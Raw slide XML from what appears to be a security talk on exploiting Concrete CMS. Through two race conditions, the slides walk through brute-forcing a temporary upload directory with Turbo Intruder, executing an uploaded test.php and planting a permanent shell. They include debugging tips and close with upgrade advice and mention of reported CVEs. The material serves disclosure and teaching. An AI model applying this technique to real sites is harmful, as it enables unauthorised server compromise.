              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a: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 name. You have 1M possibilities, we managed to send 16-17K RPS, so you can easily brute-force 500-700K in ~30 seconds, that’s a 50% chance, works great. We didn’t queue 1M requests, due to some issues with Turbo Intruder.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GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529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T1 you discover the volatile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a: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 name (win first race), but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a: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 is not there yet. Thus you have to start searching for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a: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 (2nd race condition in the file upload) which will ALWAYS be written after ~30 seconds (after T0). We’ll queue another 500K requests in Turbo Intruder for this.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529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T2 (~ 30th second) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a: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 is written locally, inside the volatile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="212529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GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529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T3 one of the queued requests from T1 executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a: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 and writes a permanent shell in the parent directory (“/application/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a: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”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529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T4 both volatile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a: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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> inside are deleted, but we already have a shell 🙂</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="2000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657725" y="1038225"/>
            <a:ext cx="7210425" cy="4762500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7210425" h="4762500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7210425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7210425" y="4762500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47625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58870" y="1035500"/>
            <a:ext cx="3914845" cy="2616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18"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4700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–1st race - guess the Temp Dir </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5118"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4700" b="1">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS) Bold"/>
              <a:ea typeface="Calibri (MS) Bold"/>
              <a:cs typeface="Calibri (MS)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705327" y="6180125"/>
            <a:ext cx="2435445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114151" y="6439286"/>
            <a:ext cx="426921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-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866775" y="1219257"/>
            <a:ext cx="5419715" cy="4419543"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7226287" cy="5892724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-11938" y="0"/>
              <a:ext cx="7247382" cy="5892800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7247382" h="5892800">
                  <a:moveTo>
                    <a:pt x="5062347" y="438785"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5067554" y="439674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5063363" y="440182"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5062348" y="440055"/>
                    <a:pt x="5062348" y="438785"/>
                    <a:pt x="5062348" y="438785"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2897632" y="113157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2902458" y="113157"/>
                    <a:pt x="2907157" y="113411"/>
                    <a:pt x="2911983" y="114046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2450846" y="199390"/>
                    <a:pt x="2017522" y="351282"/>
                    <a:pt x="1621282" y="604647"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1181735" y="885571"/>
                    <a:pt x="835914" y="1259459"/>
                    <a:pt x="565023" y="1707896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377190" y="2018157"/>
                    <a:pt x="234188" y="2349119"/>
                    <a:pt x="119253" y="2693416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112903" y="2712339"/>
                    <a:pt x="105918" y="2731135"/>
                    <a:pt x="98044" y="2749677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139573" y="2409190"/>
                    <a:pt x="247523" y="2080514"/>
                    <a:pt x="415290" y="1782826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="767207" y="1152779"/>
                    <a:pt x="1281557" y="705231"/>
                    <a:pt x="1923161" y="403606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2220849" y="262509"/>
                    <a:pt x="2537206" y="166497"/>
                    <a:pt x="2862072" y="118999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2873502" y="115062"/>
                    <a:pt x="2885440" y="113157"/>
                    <a:pt x="2897505" y="113157"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5088255" y="445770"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5125974" y="459486"/>
                    <a:pt x="5164074" y="472694"/>
                    <a:pt x="5201920" y="486918"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5241671" y="502031"/>
                    <a:pt x="5281295" y="517525"/>
                    <a:pt x="5320665" y="533654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5677154" y="678434"/>
                    <a:pt x="6018022" y="852678"/>
                    <a:pt x="6326505" y="1087501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6587744" y="1286256"/>
                    <a:pt x="6813550" y="1518666"/>
                    <a:pt x="6971538" y="1813052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7075043" y="2004187"/>
                    <a:pt x="7139178" y="2214880"/>
                    <a:pt x="7159879" y="2432177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7171563" y="2548509"/>
                    <a:pt x="7170548" y="2665730"/>
                    <a:pt x="7156450" y="2781681"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7101078" y="2383536"/>
                    <a:pt x="6954901" y="2035302"/>
                    <a:pt x="6733286" y="1719072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6457823" y="1326261"/>
                    <a:pt x="6102858" y="1022985"/>
                    <a:pt x="5701665" y="772160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5503926" y="650748"/>
                    <a:pt x="5298948" y="541655"/>
                    <a:pt x="5088382" y="445643"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5632450" y="5226050"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5633339" y="5227955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5631180" y="5227955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5632577" y="5226050"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5619623" y="5236591"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5189728" y="5514975"/>
                    <a:pt x="4739132" y="5722366"/>
                    <a:pt x="4247896" y="5791962"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3742817" y="5813298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4695317" y="5572125"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5008880" y="5478780"/>
                    <a:pt x="5317744" y="5369560"/>
                    <a:pt x="5619750" y="5236464"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3470783" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3455289" y="0"/>
                    <a:pt x="3440049" y="381"/>
                    <a:pt x="3425063" y="1143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3289808" y="2794"/>
                    <a:pt x="3175000" y="7747"/>
                    <a:pt x="3058668" y="19304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2942336" y="30861"/>
                    <a:pt x="2826893" y="46736"/>
                    <a:pt x="2712212" y="70104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100072" y="194564"/>
                    <a:pt x="1549400" y="453136"/>
                    <a:pt x="1073912" y="867156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="505714" y="1361313"/>
                    <a:pt x="134366" y="1972183"/>
                    <a:pt x="27432" y="2735199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11938" y="2844800"/>
                    <a:pt x="0" y="2955163"/>
                    <a:pt x="33274" y="3064891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46990" y="3108579"/>
                    <a:pt x="57150" y="3153410"/>
                    <a:pt x="63627" y="3199003"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99695" y="3466084"/>
                    <a:pt x="181102" y="3724656"/>
                    <a:pt x="304165" y="3963416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530352" y="4407027"/>
                    <a:pt x="858012" y="4760468"/>
                    <a:pt x="1250950" y="5053965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1630553" y="5337302"/>
                    <a:pt x="2050669" y="5535930"/>
                    <a:pt x="2498217" y="5678932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2758313" y="5763895"/>
                    <a:pt x="3026029" y="5821807"/>
                    <a:pt x="3297428" y="5852287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3408553" y="5863971"/>
                    <a:pt x="3520313" y="5864097"/>
                    <a:pt x="3631057" y="5877052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3721608" y="5887466"/>
                    <a:pt x="3812540" y="5892800"/>
                    <a:pt x="3903472" y="5892800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3908425" y="5892800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4070477" y="5892672"/>
                    <a:pt x="4232402" y="5876036"/>
                    <a:pt x="4391787" y="5843143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4847082" y="5750814"/>
                    <a:pt x="5263515" y="5561838"/>
                    <a:pt x="5650992" y="5305297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5889117" y="5147690"/>
                    <a:pt x="6114415" y="4971161"/>
                    <a:pt x="6352159" y="4812538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6597650" y="4650994"/>
                    <a:pt x="6807200" y="4438650"/>
                    <a:pt x="6966839" y="4189095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7156196" y="3897630"/>
                    <a:pt x="7242048" y="3548888"/>
                    <a:pt x="7210171" y="3200654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7200900" y="3110611"/>
                    <a:pt x="7201153" y="3019679"/>
                    <a:pt x="7211187" y="2929763"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7233031" y="2763774"/>
                    <a:pt x="7247382" y="2599182"/>
                    <a:pt x="7231507" y="2432050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7210806" y="2204974"/>
                    <a:pt x="7144765" y="1984629"/>
                    <a:pt x="7037832" y="1784477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6871335" y="1472565"/>
                    <a:pt x="6632321" y="1227074"/>
                    <a:pt x="6354190" y="1018413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5997194" y="750316"/>
                    <a:pt x="5601334" y="558800"/>
                    <a:pt x="5186807" y="404368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4755896" y="243713"/>
                    <a:pt x="4312412" y="130683"/>
                    <a:pt x="3861053" y="47371"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3727450" y="22606"/>
                    <a:pt x="3593719" y="0"/>
                    <a:pt x="3470783" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect t="-1" b="1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7139485" y="1043160"/>
            <a:ext cx="4476762" cy="735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8"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4582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-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037166" y="6363415"/>
            <a:ext cx="2100656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114151" y="6439286"/>
            <a:ext cx="236421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16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39485" y="1869275"/>
            <a:ext cx="4476762" cy="1992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58"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4550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2nd race trigger the uploaded file before deletion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44267" y="3429000"/>
            <a:ext cx="11544300" cy="1925204"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11544300" h="1925204">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11544300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11544300" y="1925204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19252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5733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04062" y="714375"/>
            <a:ext cx="11385136" cy="8108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611"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200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–The Glorious Win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87233" y="1477180"/>
            <a:ext cx="5617535" cy="713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9"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0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Remote exploit with Turbo Intruder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295262" y="6370404"/>
            <a:ext cx="1921414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114151" y="6439286"/>
            <a:ext cx="273292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5A1B18-05B8-63B1-A5D3-A80203B7B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4CF4560-75E9-10FC-2BCC-BBCD3CFF62D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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818E376C-2FAD-8B13-EA22-8040B413B431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374019" y="128123"/>
            <a:ext cx="11818953" cy="7099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90"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200" b="1" dirty="0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– Debugging Tips</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS) Bold"/>
              <a:ea typeface="Calibri (MS) Bold"/>
              <a:cs typeface="Calibri (MS) Bold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5C8ED9B2-A1D8-9657-5A88-72579FC75971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295262" y="6384226"/>
            <a:ext cx="1921710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B48652A4-4096-8076-41B2-747D4EFEE742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11114151" y="6439286"/>
            <a:ext cx="297872" cy="2094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B3F8FD-6888-908D-61F9-9A9D6F2AD600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376392" y="1386611"/>
            <a:ext cx="10889225" cy="52629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n-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the timeout for curl is 60s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> sleep() more than 60s in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/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GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>use http2 if possible (for speed, it’s easier to win the race conditions)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="28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GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/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GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>use tail -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>access_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and tail -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>error_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to monitor your requests and any errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="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GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill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GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>check that your upload request from request.txt is still a valid session</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0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GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/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GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the upload request must come from a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> by default</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="28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GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="28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5824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71963" y="346280"/>
            <a:ext cx="9700523" cy="442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03"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5407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–Solution?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58289" y="1925661"/>
            <a:ext cx="10699007" cy="23698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200" dirty="0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Upgrade to latest version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)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>
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Our Team has reported many issues (lots of CVEs received)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)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>
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Concrete CMS team has been great to work with over the past few years, kudos to them! !!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)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895827" y="6297663"/>
            <a:ext cx="2192372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14151" y="6402416"/>
            <a:ext cx="347033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32055" y="336448"/>
            <a:ext cx="4266392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09"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" b="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS) Bold"/>
                <a:cs typeface="Calibri (MS) Bold"/>
                <a:sym typeface="Calibri (MS) Bold"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r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5104763" y="6294179"/>
            <a:ext cx="2061409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191875" y="6414706"/>
            <a:ext cx="78810" cy="221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32055" y="1716775"/>
            <a:ext cx="10812725" cy="62196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70"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800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Adrian Tiron</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2786"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" spc="2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Founder &amp; Principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" spc="2" err="1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Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" spc="2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 @FORTBRIDGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" spc="2">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
